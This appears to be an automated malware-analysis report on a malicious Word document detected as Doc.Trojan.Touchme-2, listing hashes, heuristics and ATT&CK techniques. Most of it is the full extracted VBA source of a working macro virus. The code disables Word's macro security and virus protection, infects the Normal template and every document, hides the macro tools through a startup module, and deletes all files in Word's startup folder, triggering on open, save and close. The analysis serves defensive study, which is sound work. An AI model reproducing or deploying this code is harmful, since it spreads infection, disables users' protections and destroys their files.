Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e9344238c7b44185…

MALICIOUS

Office (OLE)

49.5 KB Created: 1997-04-26 16:26:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 3e661bb0e956893fe6a751811bd314a0 SHA-1: a76f70f797188393df9ac5533474422d190a2b58 SHA-256: e9344238c7b441850048efd5fc1d3e3be419f19d19138920e692bbad3cfad9fa
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for malicious documents. The script attempts to disable macro security settings and inject its code into the Normal template, indicating a persistence mechanism. The ClamAV detection 'Doc.Trojan.Touchme-2' further supports its malicious nature.

Heuristics 3

  • ClamAV: Doc.Trojan.Touchme-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Touchme-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3772 bytes
SHA-256: 77162d18d26036e7c69cdc52e2dd22698d350e0ef47ce7ca0d657ab61ab3f12d
Detection
ClamAV: Doc.Trojan.Touchme-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Created by Reza Pc 212
' Copyright © ReYoKh Team Labs
' University of Gunadarma
'
' fUcKig aLl aNtiVirUS, cAn YoU tOuCh mE ? DOnt dReAM !
'
' Last Up-Date 16 November 1999 [09.00:00]

Private Sub Infected()
    On Error Resume Next
    Dim Reg
    Dim Active As Boolean
    Dim ID, Ultah, Name As String
    Dim AD, NT As Object
    ID = "' Last Up-Date 16 November 1999 [09.00:00]"
    Set AD = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
    Set NT = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
    Reg = "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"
    If System.PrivateProfileString("", regs, "Level") <> "" Then
        CommandBars("Macro").Controls("Security...").Enabled = False
        System.PrivateProfileString("", regs, "Level") = 1&
    Else
        With Options
            .VirusProtection = False
            .ConfirmConversions = False
            .SaveNormalPrompt = False
        End With
    End If
    WordBasic.disableautomacros True
    If NT.Lines(7, 1) <> ID Then
        NT.DeleteLines 1, NT.CountOfLines
        NT.AddFromString AD.Lines(1, AD.CountOfLines)
    End If
    If AD.Lines(7, 1) <> ID Then
        AD.DeleteLines 1, AD.CountOfLines
        AD.AddFromString NT.Lines(1, NT.CountOfLines)
    End If
    For Each Obj In NormalTemplate.VBProject.VBComponents
        If Obj.Name <> "ThisDocument" Then
            Application.OrganizerDelete Source:=NormalTemplate.FullName, _
            Name:=Obj.Name, Object:=wdOrganizerObjectProjectItems
        End If
    Next Obj
    For Each Obj In ActiveDocument.VBProject.VBComponents
        If Obj.Name <> "ThisDocument" Then
            Application.OrganizerDelete Source:=ActiveDocument.FullName, _
            Name:=Obj.Name, Object:=wdOrganizerObjectProjectItems
        End If
    Next Obj
    If Day(Date) = 5 And Month(Date) = 3 Then Name = "REZA"
    If Day(Date) = 8 And Month(Date) = 8 Then Name = "YOMBI"
    If Day(Date) = 22 And Month(Date) = 12 Then Name = "NELIS"
    If Name <> "" Then
        Active = Assistant.Visible
        Assistant.Visible = True
        With Assistant.NewBalloon
            .Text = "ReYoKh Team Labs mengucapkan" + Chr(13) + Chr(13) + _
                    "Selamat Ulang Tahun  !!!" + Chr(13) + "untuk " + Name + ", bahagia selalu"
            .Show
        End With
        Assistant.Visible = Active
    End If
    Open Application.StartupPath + "\EcHa" For Output As #1
    Print #1, "Attribute VB_Name=" + Chr(34) + "EcHa" + Chr(34)
    Print #1, "Sub ViewVBCode"
    Print #1, "End Sub"
    Print #1, "Sub ToolsMacro"
    Print #1, "End Sub"
    Print #1, "Sub AutoExec"
    Print #1, "    ToolsMacro"
    Print #1, "End Sub"
    Print #1, "Sub ToolsOptions"
    Print #1, "    Options.VirusProtection=True"
    Print #1, "    Dialogs(wdDialogToolsOptions).Show"
    Print #1, "End Sub"
    Close #1
    NormalTemplate.VBProject.VBComponents.Import Application.StartupPath + "\EcHa"
    Kill Application.StartupPath + "\*.*"
    WordBasic.disableautomacros False
End Sub
Private Sub Document_Close()
    Infected
End Sub
Private Sub Document_Open()
    Infected
End Sub
Private Sub Document_Save()
    Infected
End Sub
Private Sub Document_New()
    Infected
End Sub
Private Sub Document_Exit()
    Infected
End Sub
Private Sub Document_Exec()
    Infected
End Sub